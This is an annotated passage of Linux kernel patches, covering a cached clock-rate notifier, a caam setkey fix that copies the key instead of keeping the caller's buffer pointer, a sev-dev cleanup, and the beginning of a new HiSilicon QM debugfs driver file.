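The timer-ti-dm change trades a clk_get_rate() call in the stop path for a cached fclk_rate that a rate-change notifier keeps coherent, so stopping a timer no longer reaches into the clk framework at all. Extracted from the hunk, the notifier pattern looks like this (container struct hypothetical):

	static int my_fclk_notifier(struct notifier_block *nb,
				    unsigned long event, void *data)
	{
		struct clk_notifier_data *cnd = data;
		struct my_timer *t = container_of(nb, struct my_timer,
						  fclk_nb);

		if (event != POST_RATE_CHANGE)
			return NOTIFY_DONE;

		t->fclk_rate = cnd->new_rate;	/* read later without clk calls */
		return NOTIFY_OK;
	}

	/* probe: register a managed notifier, then snapshot the rate */
	t->fclk_nb.notifier_call = my_fclk_notifier;
	ret = devm_clk_notifier_register(dev, t->fclk, &t->fclk_nb);
	if (ret)
		return ret;
	t->fclk_rate = clk_get_rate(t->fclk);
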
+diff --git a/drivers/crypto/caam/caamalg.c b/drivers/crypto/caam/caamalg.c
+index d3d8bb0a69900..e156238b4da90 100644
+--- a/drivers/crypto/caam/caamalg.c
++++ b/drivers/crypto/caam/caamalg.c
+@@ -566,7 +566,8 @@ static int chachapoly_setkey(struct crypto_aead *aead, const u8 *key,
+ 	if (keylen != CHACHA_KEY_SIZE + saltlen)
+ 		return -EINVAL;
+ 
+-	ctx->cdata.key_virt = key;
++	memcpy(ctx->key, key, keylen);
++	ctx->cdata.key_virt = ctx->key;
+ 	ctx->cdata.keylen = keylen - saltlen;
+ 
+ 	return chachapoly_set_sh_desc(aead);
+diff --git a/drivers/crypto/caam/caamalg_qi2.c b/drivers/crypto/caam/caamalg_qi2.c
+index 4482cb145d051..56058d4992cc4 100644
+--- a/drivers/crypto/caam/caamalg_qi2.c
++++ b/drivers/crypto/caam/caamalg_qi2.c
+@@ -639,7 +639,8 @@ static int chachapoly_setkey(struct crypto_aead *aead, const u8 *key,
+ 	if (keylen != CHACHA_KEY_SIZE + saltlen)
+ 		return -EINVAL;
+ 
+-	ctx->cdata.key_virt = key;
++	memcpy(ctx->key, key, keylen);
++	ctx->cdata.key_virt = ctx->key;
+ 	ctx->cdata.keylen = keylen - saltlen;
+ 
+ 	return chachapoly_set_sh_desc(aead);
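
The two caam hunks fix one lifetime bug in two drivers: a ->setkey() implementation may only read the key buffer for the duration of the call, so stashing the caller's pointer in ctx->cdata.key_virt left the shared-descriptor code reading memory the caller may have freed or reused. Copy first, point second; a generic sketch (ctx layout hypothetical):

	static int my_setkey(struct crypto_aead *aead, const u8 *key,
			     unsigned int keylen)
	{
		struct my_ctx *ctx = crypto_aead_ctx(aead);

		if (keylen > sizeof(ctx->key))
			return -EINVAL;

		memcpy(ctx->key, key, keylen);	/* 'key' dies when we return */
		ctx->keylen = keylen;
		return 0;
	}
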
+diff --git a/drivers/crypto/ccp/sev-dev.c b/drivers/crypto/ccp/sev-dev.c
+index 3e583f0324874..b8e02c3a19610 100644
+--- a/drivers/crypto/ccp/sev-dev.c
++++ b/drivers/crypto/ccp/sev-dev.c
+@@ -443,10 +443,10 @@ static int __sev_init_ex_locked(int *error)
+ 
+ static int __sev_platform_init_locked(int *error)
+ {
++	int rc = 0, psp_ret = SEV_RET_NO_FW_CALL;
+ 	struct psp_device *psp = psp_master;
+-	struct sev_device *sev;
+-	int rc = 0, psp_ret = -1;
+ 	int (*init_function)(int *error);
++	struct sev_device *sev;
+ 
+ 	if (!psp || !psp->sev_data)
+ 		return -ENODEV;
+@@ -474,9 +474,11 @@ static int __sev_platform_init_locked(int *error)
+ 		 * initialization function should succeed by replacing the state
+ 		 * with a reset state.
+ 		 */
+-		dev_err(sev->dev, "SEV: retrying INIT command because of SECURE_DATA_INVALID error. Retrying once to reset PSP SEV state.");
++		dev_err(sev->dev,
++"SEV: retrying INIT command because of SECURE_DATA_INVALID error. Retrying once to reset PSP SEV state.");
+ 		rc = init_function(&psp_ret);
+ 	}
++
+ 	if (error)
+ 		*error = psp_ret;
+ 
+diff --git a/drivers/crypto/hisilicon/Makefile b/drivers/crypto/hisilicon/Makefile
+index 1e89269a2e4b0..8595a5a5d2288 100644
+--- a/drivers/crypto/hisilicon/Makefile
++++ b/drivers/crypto/hisilicon/Makefile
+@@ -3,6 +3,6 @@ obj-$(CONFIG_CRYPTO_DEV_HISI_HPRE) += hpre/
+ obj-$(CONFIG_CRYPTO_DEV_HISI_SEC) += sec/
+ obj-$(CONFIG_CRYPTO_DEV_HISI_SEC2) += sec2/
+ obj-$(CONFIG_CRYPTO_DEV_HISI_QM) += hisi_qm.o
+-hisi_qm-objs = qm.o sgl.o
++hisi_qm-objs = qm.o sgl.o debugfs.o
+ obj-$(CONFIG_CRYPTO_DEV_HISI_ZIP) += zip/
+ obj-$(CONFIG_CRYPTO_DEV_HISI_TRNG) += trng/
+diff --git a/drivers/crypto/hisilicon/debugfs.c b/drivers/crypto/hisilicon/debugfs.c
+new file mode 100644
+index 0000000000000..13bec8b2d7237
+--- /dev/null
++++ b/drivers/crypto/hisilicon/debugfs.c
+@@ -0,0 +1,1097 @@
++// SPDX-License-Identifier: GPL-2.0
++/* Copyright (c) 2022 HiSilicon Limited. */
++#include <linux/hisi_acc_qm.h>
++#include "qm_common.h"
++
++#define QM_DFX_BASE			0x0100000
++#define QM_DFX_STATE1			0x0104000
++#define QM_DFX_STATE2			0x01040C8
++#define QM_DFX_COMMON			0x0000
++#define QM_DFX_BASE_LEN			0x5A
++#define QM_DFX_STATE1_LEN		0x2E
++#define QM_DFX_STATE2_LEN		0x11
++#define QM_DFX_COMMON_LEN		0xC3
++#define QM_DFX_REGS_LEN			4UL
++#define QM_DBG_TMP_BUF_LEN		22
++#define CURRENT_FUN_MASK		GENMASK(5, 0)
++#define CURRENT_Q_MASK			GENMASK(31, 16)
++#define QM_SQE_ADDR_MASK		GENMASK(7, 0)
++
++#define QM_DFX_MB_CNT_VF		0x104010
++#define QM_DFX_DB_CNT_VF		0x104020
++#define QM_DFX_SQE_CNT_VF_SQN		0x104030
++#define QM_DFX_CQE_CNT_VF_CQN		0x104040
++#define QM_DFX_QN_SHIFT			16
++#define QM_DFX_CNT_CLR_CE		0x100118
++#define QM_DBG_WRITE_LEN		1024
++
++static const char * const qm_debug_file_name[] = {
++	[CURRENT_QM]   = "current_qm",
++	[CURRENT_Q]    = "current_q",
++	[CLEAR_ENABLE] = "clear_enable",
++};
++
++struct qm_dfx_item {
++	const char *name;
++	u32 offset;
++};
++
++static struct qm_dfx_item qm_dfx_files[] = {
++	{"err_irq", offsetof(struct qm_dfx, err_irq_cnt)},
++	{"aeq_irq", offsetof(struct qm_dfx, aeq_irq_cnt)},
++	{"abnormal_irq", offsetof(struct qm_dfx, abnormal_irq_cnt)},
++	{"create_qp_err", offsetof(struct qm_dfx, create_qp_err_cnt)},
++	{"mb_err", offsetof(struct qm_dfx, mb_err_cnt)},
++};
++
++#define CNT_CYC_REGS_NUM		10
++static const struct debugfs_reg32 qm_dfx_regs[] = {
++	/* XXX_CNT are reading clear register */
++	{"QM_ECC_1BIT_CNT               ",  0x104000ull},
++	{"QM_ECC_MBIT_CNT               ",  0x104008ull},
++	{"QM_DFX_MB_CNT                 ",  0x104018ull},
++	{"QM_DFX_DB_CNT                 ",  0x104028ull},
++	{"QM_DFX_SQE_CNT                ",  0x104038ull},
++	{"QM_DFX_CQE_CNT                ",  0x104048ull},
++	{"QM_DFX_SEND_SQE_TO_ACC_CNT    ",  0x104050ull},
++	{"QM_DFX_WB_SQE_FROM_ACC_CNT    ",  0x104058ull},
++	{"QM_DFX_ACC_FINISH_CNT         ",  0x104060ull},
++	{"QM_DFX_CQE_ERR_CNT            ",  0x1040b4ull},
++	{"QM_DFX_FUNS_ACTIVE_ST         ",  0x200ull},
++	{"QM_ECC_1BIT_INF               ",  0x104004ull},
++	{"QM_ECC_MBIT_INF               ",  0x10400cull},
++	{"QM_DFX_ACC_RDY_VLD0           ",  0x1040a0ull},
++	{"QM_DFX_ACC_RDY_VLD1           ",  0x1040a4ull},
++	{"QM_DFX_AXI_RDY_VLD            ",  0x1040a8ull},
++	{"QM_DFX_FF_ST0                 ",  0x1040c8ull},
++	{"QM_DFX_FF_ST1                 ",  0x1040ccull},
++	{"QM_DFX_FF_ST2                 ",  0x1040d0ull},
++	{"QM_DFX_FF_ST3                 ",  0x1040d4ull},
++	{"QM_DFX_FF_ST4                 ",  0x1040d8ull},
++	{"QM_DFX_FF_ST5                 ",  0x1040dcull},
++	{"QM_DFX_FF_ST6                 ",  0x1040e0ull},
++	{"QM_IN_IDLE_ST                 ",  0x1040e4ull},
++};
++
++static const struct debugfs_reg32 qm_vf_dfx_regs[] = {
++	{"QM_DFX_FUNS_ACTIVE_ST         ",  0x200ull},
++};
++
++/* define the QM's dfx regs region and region length */
++static struct dfx_diff_registers qm_diff_regs[] = {
++	{
++		.reg_offset = QM_DFX_BASE,
++		.reg_len = QM_DFX_BASE_LEN,
++	}, {
++		.reg_offset = QM_DFX_STATE1,
++		.reg_len = QM_DFX_STATE1_LEN,
++	}, {
++		.reg_offset = QM_DFX_STATE2,
++		.reg_len = QM_DFX_STATE2_LEN,
++	}, {
++		.reg_offset = QM_DFX_COMMON,
++		.reg_len = QM_DFX_COMMON_LEN,
++	},
++};
++
++static struct hisi_qm *file_to_qm(struct debugfs_file *file)
++{
++	struct qm_debug *debug = file->debug;
++
++	return container_of(debug, struct hisi_qm, debug);
++}
++
++static ssize_t qm_cmd_read(struct file *filp, char __user *buffer,
++			   size_t count, loff_t *pos)
++{
++	char buf[QM_DBG_READ_LEN];
++	int len;
++
++	len = scnprintf(buf, QM_DBG_READ_LEN, "%s\n",
++			"Please echo help to cmd to get help information");
++
++	return simple_read_from_buffer(buffer, count, pos, buf, len);
++}
++
++static void dump_show(struct hisi_qm *qm, void *info,
++		     unsigned int info_size, char *info_name)
++{
++	struct device *dev = &qm->pdev->dev;
++	u8 *info_curr = info;
++	u32 i;
++#define BYTE_PER_DW	4
++
++	dev_info(dev, "%s DUMP\n", info_name);
++	for (i = 0; i < info_size; i += BYTE_PER_DW, info_curr += BYTE_PER_DW) {
++		pr_info("DW%u: %02X%02X %02X%02X\n", i / BYTE_PER_DW,
++			*(info_curr + 3), *(info_curr + 2), *(info_curr + 1), *(info_curr));
++	}
++}
++
++static int qm_sqc_dump(struct hisi_qm *qm, const char *s)
++{
++	struct device *dev = &qm->pdev->dev;
++	struct qm_sqc *sqc, *sqc_curr;
++	dma_addr_t sqc_dma;
++	u32 qp_id;
++	int ret;
++
++	if (!s)
++		return -EINVAL;
++
++	ret = kstrtou32(s, 0, &qp_id);
++	if (ret || qp_id >= qm->qp_num) {
++		dev_err(dev, "Please input qp num (0-%u)", qm->qp_num - 1);
++		return -EINVAL;
++	}
++
++	sqc = hisi_qm_ctx_alloc(qm, sizeof(*sqc), &sqc_dma);
++	if (IS_ERR(sqc))
++		return PTR_ERR(sqc);
++
++	ret = hisi_qm_mb(qm, QM_MB_CMD_SQC, sqc_dma, qp_id, 1);
++	if (ret) {
++		down_read(&qm->qps_lock);
++		if (qm->sqc) {
++			sqc_curr = qm->sqc + qp_id;
++
++			dump_show(qm, sqc_curr, sizeof(*sqc), "SOFT SQC");
++		}
++		up_read(&qm->qps_lock);
++
++		goto free_ctx;
++	}
++
++	dump_show(qm, sqc, sizeof(*sqc), "SQC");
++
++free_ctx:
++	hisi_qm_ctx_free(qm, sizeof(*sqc), sqc, &sqc_dma);
++	return 0;
++}
++
++static int qm_cqc_dump(struct hisi_qm *qm, const char *s)
++{
++	struct device *dev = &qm->pdev->dev;
++	struct qm_cqc *cqc, *cqc_curr;
++	dma_addr_t cqc_dma;
++	u32 qp_id;
++	int ret;
++
++	if (!s)
++		return -EINVAL;
++
++	ret = kstrtou32(s, 0, &qp_id);
++	if (ret || qp_id >= qm->qp_num) {
++		dev_err(dev, "Please input qp num (0-%u)", qm->qp_num - 1);
++		return -EINVAL;
++	}
++
++	cqc = hisi_qm_ctx_alloc(qm, sizeof(*cqc), &cqc_dma);
++	if (IS_ERR(cqc))
++		return PTR_ERR(cqc);
++
++	ret = hisi_qm_mb(qm, QM_MB_CMD_CQC, cqc_dma, qp_id, 1);
++	if (ret) {
++		down_read(&qm->qps_lock);
++		if (qm->cqc) {
++			cqc_curr = qm->cqc + qp_id;
++
++			dump_show(qm, cqc_curr, sizeof(*cqc), "SOFT CQC");
++		}
++		up_read(&qm->qps_lock);
++
++		goto free_ctx;
++	}
++
++	dump_show(qm, cqc, sizeof(*cqc), "CQC");
++
++free_ctx:
++	hisi_qm_ctx_free(qm, sizeof(*cqc), cqc, &cqc_dma);
++	return 0;
++}
++
++static int qm_eqc_aeqc_dump(struct hisi_qm *qm, char *s, size_t size,
++			    int cmd, char *name)
++{
++	struct device *dev = &qm->pdev->dev;
++	dma_addr_t xeqc_dma;
++	void *xeqc;
++	int ret;
++
++	if (strsep(&s, " ")) {
++		dev_err(dev, "Please do not input extra characters!\n");
++		return -EINVAL;
++	}
++
++	xeqc = hisi_qm_ctx_alloc(qm, size, &xeqc_dma);
++	if (IS_ERR(xeqc))
++		return PTR_ERR(xeqc);
++
++	ret = hisi_qm_mb(qm, cmd, xeqc_dma, 0, 1);
++	if (ret)
++		goto err_free_ctx;
++
++	dump_show(qm, xeqc, size, name);
++
++err_free_ctx:
++	hisi_qm_ctx_free(qm, size, xeqc, &xeqc_dma);
++	return ret;
++}
++
++static int q_dump_param_parse(struct hisi_qm *qm, char *s,
++			      u32 *e_id, u32 *q_id, u16 q_depth)
++{
++	struct device *dev = &qm->pdev->dev;
++	unsigned int qp_num = qm->qp_num;
++	char *presult;
++	int ret;
++
++	presult = strsep(&s, " ");
++	if (!presult) {
++		dev_err(dev, "Please input qp number!\n");
++		return -EINVAL;
++	}
++
++	ret = kstrtou32(presult, 0, q_id);
++	if (ret || *q_id >= qp_num) {
++		dev_err(dev, "Please input qp num (0-%u)", qp_num - 1);
++		return -EINVAL;
++	}
++
++	presult = strsep(&s, " ");
++	if (!presult) {
++		dev_err(dev, "Please input sqe number!\n");
++		return -EINVAL;
++	}
++
++	ret = kstrtou32(presult, 0, e_id);
++	if (ret || *e_id >= q_depth) {
++		dev_err(dev, "Please input sqe num (0-%u)", q_depth - 1);
++		return -EINVAL;
++	}
++
++	if (strsep(&s, " ")) {
++		dev_err(dev, "Please do not input extra characters!\n");
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++static int qm_sq_dump(struct hisi_qm *qm, char *s)
++{
++	u16 sq_depth = qm->qp_array->cq_depth;
++	void *sqe, *sqe_curr;
++	struct hisi_qp *qp;
++	u32 qp_id, sqe_id;
++	int ret;
++
++	ret = q_dump_param_parse(qm, s, &sqe_id, &qp_id, sq_depth);
++	if (ret)
++		return ret;
++
++	sqe = kzalloc(qm->sqe_size * sq_depth, GFP_KERNEL);
++	if (!sqe)
++		return -ENOMEM;
++
++	qp = &qm->qp_array[qp_id];
++	memcpy(sqe, qp->sqe, qm->sqe_size * sq_depth);
++	sqe_curr = sqe + (u32)(sqe_id * qm->sqe_size);
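++	/* Mask the address fields in the SQE copy to avoid leaking DMA addresses */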
++	memset(sqe_curr + qm->debug.sqe_mask_offset, QM_SQE_ADDR_MASK,
++	       qm->debug.sqe_mask_len);
++
++	dump_show(qm, sqe_curr, qm->sqe_size, "SQE");
++
++	kfree(sqe);
++
++	return 0;
++}
++
++static int qm_cq_dump(struct hisi_qm *qm, char *s)
++{
++	struct qm_cqe *cqe_curr;
++	struct hisi_qp *qp;
++	u32 qp_id, cqe_id;
++	int ret;
++
++	ret = q_dump_param_parse(qm, s, &cqe_id, &qp_id, qm->qp_array->cq_depth);
++	if (ret)
++		return ret;
++
++	qp = &qm->qp_array[qp_id];
++	cqe_curr = qp->cqe + cqe_id;
++	dump_show(qm, cqe_curr, sizeof(struct qm_cqe), "CQE");
++
++	return 0;
++}
++
++static int qm_eq_aeq_dump(struct hisi_qm *qm, const char *s,
++			  size_t size, char *name)
++{
++	struct device *dev = &qm->pdev->dev;
++	void *xeqe;
++	u32 xeqe_id;
++	int ret;
++
++	if (!s)
++		return -EINVAL;
++
++	ret = kstrtou32(s, 0, &xeqe_id);
++	if (ret)
++		return -EINVAL;
++
++	if (!strcmp(name, "EQE") && xeqe_id >= qm->eq_depth) {
++		dev_err(dev, "Please input eqe num (0-%u)", qm->eq_depth - 1);
++		return -EINVAL;
++	} else if (!strcmp(name, "AEQE") && xeqe_id >= qm->aeq_depth) {
++		dev_err(dev, "Please input aeqe num (0-%u)", qm->eq_depth - 1);
++		return -EINVAL;
++	}
++
++	down_read(&qm->qps_lock);
++
++	if (qm->eqe && !strcmp(name, "EQE")) {
++		xeqe = qm->eqe + xeqe_id;
++	} else if (qm->aeqe && !strcmp(name, "AEQE")) {
++		xeqe = qm->aeqe + xeqe_id;
++	} else {
++		ret = -EINVAL;
++		goto err_unlock;
++	}
++
++	dump_show(qm, xeqe, size, name);
++
++err_unlock:
++	up_read(&qm->qps_lock);
++	return ret;
++}
++
++static int qm_dbg_help(struct hisi_qm *qm, char *s)
++{
++	struct device *dev = &qm->pdev->dev;
++
++	if (strsep(&s, " ")) {
++		dev_err(dev, "Please do not input extra characters!\n");
++		return -EINVAL;
++	}
++
++	dev_info(dev, "available commands:\n");
++	dev_info(dev, "sqc <num>\n");
++	dev_info(dev, "cqc <num>\n");
++	dev_info(dev, "eqc\n");
++	dev_info(dev, "aeqc\n");
++	dev_info(dev, "sq <num> <e>\n");
++	dev_info(dev, "cq <num> <e>\n");
++	dev_info(dev, "eq <e>\n");
++	dev_info(dev, "aeq <e>\n");
++
++	return 0;
++}
++
++static int qm_cmd_write_dump(struct hisi_qm *qm, const char *cmd_buf)
++{
++	struct device *dev = &qm->pdev->dev;
++	char *presult, *s, *s_tmp;
++	int ret;
++
++	s = kstrdup(cmd_buf, GFP_KERNEL);
++	if (!s)
++		return -ENOMEM;
++
++	s_tmp = s;
++	presult = strsep(&s, " ");
++	if (!presult) {
++		ret = -EINVAL;
++		goto err_buffer_free;
++	}
++
++	if (!strcmp(presult, "sqc"))
++		ret = qm_sqc_dump(qm, s);
++	else if (!strcmp(presult, "cqc"))
++		ret = qm_cqc_dump(qm, s);
++	else if (!strcmp(presult, "eqc"))
++		ret = qm_eqc_aeqc_dump(qm, s, sizeof(struct qm_eqc),
++				       QM_MB_CMD_EQC, "EQC");
++	else if (!strcmp(presult, "aeqc"))
++		ret = qm_eqc_aeqc_dump(qm, s, sizeof(struct qm_aeqc),
++				       QM_MB_CMD_AEQC, "AEQC");
++	else if (!strcmp(presult, "sq"))
++		ret = qm_sq_dump(qm, s);
++	else if (!strcmp(presult, "cq"))
++		ret = qm_cq_dump(qm, s);
++	else if (!strcmp(presult, "eq"))
++		ret = qm_eq_aeq_dump(qm, s, sizeof(struct qm_eqe), "EQE");
++	else if (!strcmp(presult, "aeq"))
++		ret = qm_eq_aeq_dump(qm, s, sizeof(struct qm_aeqe), "AEQE");
++	else if (!strcmp(presult, "help"))
++		ret = qm_dbg_help(qm, s);
++	else
++		ret = -EINVAL;
++
++	if (ret)
++		dev_info(dev, "Please echo help\n");
++
++err_buffer_free:
++	kfree(s_tmp);
++
++	return ret;
++}
++
++static ssize_t qm_cmd_write(struct file *filp, const char __user *buffer,
++			    size_t count, loff_t *pos)
++{
++	struct hisi_qm *qm = filp->private_data;
++	char *cmd_buf, *cmd_buf_tmp;
++	int ret;
++
++	if (*pos)
++		return 0;
++
++	ret = hisi_qm_get_dfx_access(qm);
++	if (ret)
++		return ret;
++
++	/* Check whether the instance is being reset. */
++	if (unlikely(atomic_read(&qm->status.flags) == QM_STOP)) {
++		ret = 0;
++		goto put_dfx_access;
++	}
++
++	if (count > QM_DBG_WRITE_LEN) {
++		ret = -ENOSPC;
++		goto put_dfx_access;
++	}
++
++	cmd_buf = memdup_user_nul(buffer, count);
++	if (IS_ERR(cmd_buf)) {
++		ret = PTR_ERR(cmd_buf);
++		goto put_dfx_access;
++	}
++
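++	/* Strip the trailing newline that echo appends to the command */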
++	cmd_buf_tmp = strchr(cmd_buf, '\n');
++	if (cmd_buf_tmp) {
++		*cmd_buf_tmp = '\0';
++		count = cmd_buf_tmp - cmd_buf + 1;
++	}
++
++	ret = qm_cmd_write_dump(qm, cmd_buf);
++	if (ret) {
++		kfree(cmd_buf);
++		goto put_dfx_access;
++	}
++
++	kfree(cmd_buf);
++
++	ret = count;
++
++put_dfx_access:
++	hisi_qm_put_dfx_access(qm);
++	return ret;
++}
++
++static const struct file_operations qm_cmd_fops = {
++	.owner = THIS_MODULE,
++	.open = simple_open,
++	.read = qm_cmd_read,
++	.write = qm_cmd_write,
++};
++
++/**
++ * hisi_qm_regs_dump() - Dump registers' values.
++ * @s: debugfs file handle.
++ * @regset: accelerator registers information.
++ *
++ * Dump accelerator registers.
++ */
++void hisi_qm_regs_dump(struct seq_file *s, struct debugfs_regset32 *regset)
++{
++	struct pci_dev *pdev = to_pci_dev(regset->dev);
++	struct hisi_qm *qm = pci_get_drvdata(pdev);
++	const struct debugfs_reg32 *regs = regset->regs;
++	int regs_len = regset->nregs;
++	int i, ret;
++	u32 val;
++
++	ret = hisi_qm_get_dfx_access(qm);
++	if (ret)
++		return;
++
++	for (i = 0; i < regs_len; i++) {
++		val = readl(regset->base + regs[i].offset);
++		seq_printf(s, "%s= 0x%08x\n", regs[i].name, val);
++	}
++
++	hisi_qm_put_dfx_access(qm);
++}
++EXPORT_SYMBOL_GPL(hisi_qm_regs_dump);
++
++static int qm_regs_show(struct seq_file *s, void *unused)
++{
++	struct hisi_qm *qm = s->private;
++	struct debugfs_regset32 regset;
++
++	if (qm->fun_type == QM_HW_PF) {
++		regset.regs = qm_dfx_regs;
++		regset.nregs = ARRAY_SIZE(qm_dfx_regs);
++	} else {
++		regset.regs = qm_vf_dfx_regs;
++		regset.nregs = ARRAY_SIZE(qm_vf_dfx_regs);
++	}
++
++	regset.base = qm->io_base;
++	regset.dev = &qm->pdev->dev;
++
++	hisi_qm_regs_dump(s, &regset);
++
++	return 0;
++}
++
++DEFINE_SHOW_ATTRIBUTE(qm_regs);
++
++static u32 current_q_read(struct hisi_qm *qm)
++{
++	return readl(qm->io_base + QM_DFX_SQE_CNT_VF_SQN) >> QM_DFX_QN_SHIFT;
++}
++
++static int current_q_write(struct hisi_qm *qm, u32 val)
++{
++	u32 tmp;
++
++	if (val >= qm->debug.curr_qm_qp_num)
++		return -EINVAL;
++
++	tmp = val << QM_DFX_QN_SHIFT |
++	      (readl(qm->io_base + QM_DFX_SQE_CNT_VF_SQN) & CURRENT_FUN_MASK);
++	writel(tmp, qm->io_base + QM_DFX_SQE_CNT_VF_SQN);
++
++	tmp = val << QM_DFX_QN_SHIFT |
++	      (readl(qm->io_base + QM_DFX_CQE_CNT_VF_CQN) & CURRENT_FUN_MASK);
++	writel(tmp, qm->io_base + QM_DFX_CQE_CNT_VF_CQN);
++
++	return 0;
++}
++
++static u32 clear_enable_read(struct hisi_qm *qm)
++{
++	return readl(qm->io_base + QM_DFX_CNT_CLR_CE);
++}
++
++/* rd_clr_ctrl: 1 enables read-clear, 0 disables it */
++static int clear_enable_write(struct hisi_qm *qm, u32 rd_clr_ctrl)
++{
++	if (rd_clr_ctrl > 1)
++		return -EINVAL;
++
++	writel(rd_clr_ctrl, qm->io_base + QM_DFX_CNT_CLR_CE);
++
++	return 0;
++}
++
++static u32 current_qm_read(struct hisi_qm *qm)
++{
++	return readl(qm->io_base + QM_DFX_MB_CNT_VF);
++}
++
++static int qm_get_vf_qp_num(struct hisi_qm *qm, u32 fun_num)
++{
++	u32 remain_q_num, vfq_num;
++	u32 num_vfs = qm->vfs_num;
++
++	vfq_num = (qm->ctrl_qp_num - qm->qp_num) / num_vfs;
++	if (vfq_num >= qm->max_qp_num)
++		return qm->max_qp_num;
++
++	remain_q_num = (qm->ctrl_qp_num - qm->qp_num) % num_vfs;
++	if (vfq_num + remain_q_num <= qm->max_qp_num)
++		return fun_num == num_vfs ? vfq_num + remain_q_num : vfq_num;
++
++	/*
++	 * If vfq_num + remain_q_num > max_qp_num, each of the last
++	 * remain_q_num VFs gets one more queue.
++	 */
++	return fun_num + remain_q_num > num_vfs ? vfq_num + 1 : vfq_num;
++}
++
++static int current_qm_write(struct hisi_qm *qm, u32 val)
++{
++	u32 tmp;
++
++	if (val > qm->vfs_num)
++		return -EINVAL;
++
++	/* Calculate and store curr_qm_qp_num according to the PF or VF Dev ID */
++	if (!val)
++		qm->debug.curr_qm_qp_num = qm->qp_num;
++	else
++		qm->debug.curr_qm_qp_num = qm_get_vf_qp_num(qm, val);
++
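++	/* Select the function whose DFX counters the registers below report */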
++	writel(val, qm->io_base + QM_DFX_MB_CNT_VF);
++	writel(val, qm->io_base + QM_DFX_DB_CNT_VF);
++
++	tmp = val |
++	      (readl(qm->io_base + QM_DFX_SQE_CNT_VF_SQN) & CURRENT_Q_MASK);
++	writel(tmp, qm->io_base + QM_DFX_SQE_CNT_VF_SQN);
++
++	tmp = val |
++	      (readl(qm->io_base + QM_DFX_CQE_CNT_VF_CQN) & CURRENT_Q_MASK);
++	writel(tmp, qm->io_base + QM_DFX_CQE_CNT_VF_CQN);
++
++	return 0;
++}
++
++static ssize_t qm_debug_read(struct file *filp, char __user *buf,
++			     size_t count, loff_t *pos)
++{
++	struct debugfs_file *file = filp->private_data;
++	enum qm_debug_file index = file->index;
++	struct hisi_qm *qm = file_to_qm(file);
++	char tbuf[QM_DBG_TMP_BUF_LEN];
++	u32 val;
++	int ret;
++
++	ret = hisi_qm_get_dfx_access(qm);
++	if (ret)
++		return ret;
++
++	mutex_lock(&file->lock);
++	switch (index) {
++	case CURRENT_QM:
++		val = current_qm_read(qm);
++		break;
++	case CURRENT_Q:
++		val = current_q_read(qm);
++		break;
++	case CLEAR_ENABLE:
++		val = clear_enable_read(qm);
++		break;
++	default:
++		goto err_input;
++	}
++	mutex_unlock(&file->lock);
++
++	hisi_qm_put_dfx_access(qm);
++	ret = scnprintf(tbuf, QM_DBG_TMP_BUF_LEN, "%u\n", val);
++	return simple_read_from_buffer(buf, count, pos, tbuf, ret);
++
++err_input:
++	mutex_unlock(&file->lock);
++	hisi_qm_put_dfx_access(qm);
++	return -EINVAL;
++}
++
++static ssize_t qm_debug_write(struct file *filp, const char __user *buf,
++			      size_t count, loff_t *pos)
++{
++	struct debugfs_file *file = filp->private_data;
++	enum qm_debug_file index = file->index;
++	struct hisi_qm *qm = file_to_qm(file);
++	unsigned long val;
++	char tbuf[QM_DBG_TMP_BUF_LEN];
++	int len, ret;
++
++	if (*pos != 0)
++		return 0;
++
++	if (count >= QM_DBG_TMP_BUF_LEN)
++		return -ENOSPC;
++
++	len = simple_write_to_buffer(tbuf, QM_DBG_TMP_BUF_LEN - 1, pos, buf,
++				     count);
++	if (len < 0)
++		return len;
++
++	tbuf[len] = '\0';
++	if (kstrtoul(tbuf, 0, &val))
++		return -EFAULT;
++
++	ret = hisi_qm_get_dfx_access(qm);
++	if (ret)
++		return ret;
++
++	mutex_lock(&file->lock);
++	switch (index) {
++	case CURRENT_QM:
++		ret = current_qm_write(qm, val);
++		break;
++	case CURRENT_Q:
++		ret = current_q_write(qm, val);
++		break;
++	case CLEAR_ENABLE:
++		ret = clear_enable_write(qm, val);
++		break;
++	default:
++		ret = -EINVAL;
++	}
++	mutex_unlock(&file->lock);
++
++	hisi_qm_put_dfx_access(qm);
++
++	if (ret)
++		return ret;
++
++	return count;
++}
++
++static const struct file_operations qm_debug_fops = {
++	.owner = THIS_MODULE,
++	.open = simple_open,
++	.read = qm_debug_read,
++	.write = qm_debug_write,
++};
++
++static void dfx_regs_uninit(struct hisi_qm *qm,
++		struct dfx_diff_registers *dregs, int reg_len)
++{
++	int i;
++
++	/* Set the pointers to NULL to prevent a double free */
++	for (i = 0; i < reg_len; i++) {
++		kfree(dregs[i].regs);
++		dregs[i].regs = NULL;
++	}
++	kfree(dregs);
++}
++
++static struct dfx_diff_registers *dfx_regs_init(struct hisi_qm *qm,
++	const struct dfx_diff_registers *cregs, u32 reg_len)
++{
++	struct dfx_diff_registers *diff_regs;
++	u32 j, base_offset;
++	int i;
++
++	diff_regs = kcalloc(reg_len, sizeof(*diff_regs), GFP_KERNEL);
++	if (!diff_regs)
++		return ERR_PTR(-ENOMEM);
++
++	for (i = 0; i < reg_len; i++) {
++		if (!cregs[i].reg_len)
++			continue;
++
++		diff_regs[i].reg_offset = cregs[i].reg_offset;
++		diff_regs[i].reg_len = cregs[i].reg_len;
++		diff_regs[i].regs = kcalloc(QM_DFX_REGS_LEN, cregs[i].reg_len,
++					 GFP_KERNEL);
++		if (!diff_regs[i].regs)
++			goto alloc_error;
++
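++		/* Snapshot the current register values as the comparison baseline */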
++		for (j = 0; j < diff_regs[i].reg_len; j++) {
++			base_offset = diff_regs[i].reg_offset +
++					j * QM_DFX_REGS_LEN;
++			diff_regs[i].regs[j] = readl(qm->io_base + base_offset);
++		}
++	}
++
++	return diff_regs;
++
++alloc_error:
++	while (i > 0) {
++		i--;
++		kfree(diff_regs[i].regs);
++	}
++	kfree(diff_regs);
++	return ERR_PTR(-ENOMEM);
++}
++
++static int qm_diff_regs_init(struct hisi_qm *qm,
++		struct dfx_diff_registers *dregs, u32 reg_len)
++{
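++	/* Take baselines for both the QM core regs and the accelerator regs */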
++	qm->debug.qm_diff_regs = dfx_regs_init(qm, qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
++	if (IS_ERR(qm->debug.qm_diff_regs))
++		return PTR_ERR(qm->debug.qm_diff_regs);
++
++	qm->debug.acc_diff_regs = dfx_regs_init(qm, dregs, reg_len);
++	if (IS_ERR(qm->debug.acc_diff_regs)) {
++		dfx_regs_uninit(qm, qm->debug.qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
++		return PTR_ERR(qm->debug.acc_diff_regs);
++	}
++
